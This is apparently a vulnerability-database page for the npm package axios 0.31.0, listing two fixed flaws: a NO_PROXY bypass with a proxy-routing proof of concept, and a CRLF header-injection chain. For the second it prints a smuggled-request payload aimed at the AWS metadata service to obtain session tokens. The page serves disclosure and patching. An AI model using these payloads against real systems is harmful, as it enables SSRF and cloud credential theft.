Staging Environment: Content and features may be unstable or change without notice.
Search for packages
Package details: pkg:npm/axios@0.31.0
purl pkg:npm/axios@0.31.0
Vulnerabilities affecting this package (0)
Vulnerability Summary Fixed by
This package is not known to be affected by vulnerabilities.
Vulnerabilities fixed by this package (2)
Vulnerability Summary Aliases
VCID-axk7-6q4b-vuga Axios has a NO_PROXY Hostname Normalization Bypass Leads to SSRF Axios does not correctly handle hostname normalization when checking `NO_PROXY` rules. Requests to loopback addresses like `localhost.` (with a trailing dot) or `[::1]` (IPv6 literal) skip `NO_PROXY` matching and go through the configured proxy. This goes against what developers expect and lets attackers force requests through a proxy, even if `NO_PROXY` is set up to protect loopback or internal services. According to [RFC 1034 §3.1](https://datatracker.ietf.org/doc/html/rfc1034#section-3.1) and [RFC 3986 §3.2.2](https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2), a hostname can have a trailing dot to show it is a fully qualified domain name (FQDN). At the DNS level, `localhost.` is the same as `localhost`. However, Axios does a literal string comparison instead of normalizing hostnames before checking `NO_PROXY`. This causes requests like `http://localhost.:8080/` and `http://[::1]:8080/` to be incorrectly proxied. This issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections. --- **PoC** ```js import http from "http"; import axios from "axios"; const proxyPort = 5300; http.createServer((req, res) => { console.log("[PROXY] Got:", req.method, req.url, "Host:", req.headers.host); res.writeHead(200, { "Content-Type": "text/plain" }); res.end("proxied"); }).listen(proxyPort, () => console.log("Proxy", proxyPort)); process.env.HTTP_PROXY = `http://127.0.0.1:${proxyPort}`; process.env.NO_PROXY = "localhost,127.0.0.1,::1"; async function test(url) { try { await axios.get(url, { timeout: 2000 }); } catch {} } setTimeout(async () => { console.log("\n[*] Testing http://localhost.:8080/"); await test("http://localhost.:8080/"); // goes through proxy console.log("\n[*] Testing http://[::1]:8080/"); await test("http://[::1]:8080/"); // goes through proxy }, 500); ``` **Expected:** Requests bypass the proxy (direct to loopback). **Actual:** Proxy logs requests for `localhost.` and `[::1]`. --- **Impact** * Applications that rely on `NO_PROXY=localhost,127.0.0.1,::1` for protecting loopback/internal access are vulnerable. * Attackers controlling request URLs can: * Force Axios to send local traffic through an attacker-controlled proxy. * Bypass SSRF mitigations relying on NO\_PROXY rules. * Potentially exfiltrate sensitive responses from internal services via the proxy. --- **Affected Versions** * Confirmed on Axios **1.12.2** (latest at time of testing). * affects all versions that rely on Axios’ current `NO_PROXY` evaluation. --- **Remediation** Axios should normalize hostnames before evaluating `NO_PROXY`, including: * Strip trailing dots from hostnames (per RFC 3986). * Normalize IPv6 literals by removing brackets for matching. CVE-2025-62718
GHSA-3p68-rc4w-qgx5
VCID-ek49-tuj4-t3ap Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain # Vulnerability Disclosure: Unrestricted Cloud Metadata Exfiltration via Header Injection Chain ## Summary The Axios library is vulnerable to a specific "Gadget" attack chain that allows **Prototype Pollution** in any third-party dependency to be escalated into **Remote Code Execution (RCE)** or **Full Cloud Compromise** (via AWS IMDSv2 bypass). While Axios patches exist for *preventing check* pollution, the library remains vulnerable to *being used* as a gadget when pollution occurs elsewhere. This is due to a lack of HTTP Header Sanitization (CWE-113) combined with default SSRF capabilities. **Severity**: Critical (CVSS 9.9) **Affected Versions**: All versions (v0.x - v1.x) **Vulnerable Component**: `lib/adapters/http.js` (Header Processing) ## Usage of "Helper" Vulnerabilities This vulnerability is unique because it requires **Zero Direct User Input**. If an attacker can pollute `Object.prototype` via *any* other library in the stack (e.g., `qs`, `minimist`, `ini`, `body-parser`), Axios will automatically pick up the polluted properties during its config merge. Because Axios does not sanitise these merged header values for CRLF (`\r\n`) characters, the polluted property becomes a **Request Smuggling** payload. ## Proof of Concept ### 1. The Setup (Simulated Pollution) Imagine a scenario where a known vulnerability exists in a query parser. The attacker sends a payload that sets: ```javascript Object.prototype['x-amz-target'] = "dummy\r\n\r\nPUT /latest/api/token HTTP/1.1\r\nHost: 169.254.169.254\r\nX-aws-ec2-metadata-token-ttl-seconds: 21600\r\n\r\nGET /ignore"; ``` ### 2. The Gadget Trigger (Safe Code) The application makes a completely safe, hardcoded request: ```javascript // This looks safe to the developer await axios.get('https://analytics.internal/pings'); ``` ### 3. The Execution Axios merges the prototype property `x-amz-target` into the request headers. It then writes the header value directly to the socket without validation. **Resulting HTTP traffic:** ```http GET /pings HTTP/1.1 Host: analytics.internal x-amz-target: dummy PUT /latest/api/token HTTP/1.1 Host: 169.254.169.254 X-aws-ec2-metadata-token-ttl-seconds: 21600 GET /ignore HTTP/1.1 ... ``` ### 4. The Impact (IMDSv2 Bypass) The "Smuggled" second request is a valid `PUT` request to the AWS Metadata Service. It includes the required `X-aws-ec2-metadata-token-ttl-seconds` header (which a normal SSRF cannot send). The Metadata Service returns a session token, allowing the attacker to steal IAM credentials and compromise the cloud account. ## Impact Analysis - **Security Control Bypass**: Defeats AWS IMDSv2 (Session Tokens). - **Authentication Bypass**: Can inject headers (`Cookie`, `Authorization`) to pivot into internal administrative panels. - **Cache Poisoning**: Can inject `Host` headers to poison shared caches. ## Recommended Fix Validate all header values in `lib/adapters/http.js` and `xhr.js` before passing them to the underlying request function. **Patch Suggestion:** ```javascript // In lib/adapters/http.js utils.forEach(requestHeaders, function setRequestHeader(val, key) { if (/[\r\n]/.test(val)) { throw new Error('Security: Header value contains invalid characters'); } // ... proceed to set header }); ``` ## References - **OWASP**: CRLF Injection (CWE-113) This report was generated as part of a security audit of the Axios library. CVE-2026-40175
GHSA-fvcv-3m26-pcqx

Date Actor Action Vulnerability Source VulnerableCode Version
2026-04-18T04:27:36.775320+00:00 GithubOSV Importer Fixing VCID-axk7-6q4b-vuga https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-3p68-rc4w-qgx5/GHSA-3p68-rc4w-qgx5.json 38.4.0
2026-04-16T07:45:51.418953+00:00 GHSA Importer Fixing VCID-ek49-tuj4-t3ap https://github.com/advisories/GHSA-fvcv-3m26-pcqx 38.4.0
2026-04-16T07:45:49.431368+00:00 GHSA Importer Fixing VCID-axk7-6q4b-vuga https://github.com/advisories/GHSA-3p68-rc4w-qgx5 38.4.0
2026-04-15T12:48:29.757120+00:00 GithubOSV Importer Fixing VCID-ek49-tuj4-t3ap https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-fvcv-3m26-pcqx/GHSA-fvcv-3m26-pcqx.json 38.4.0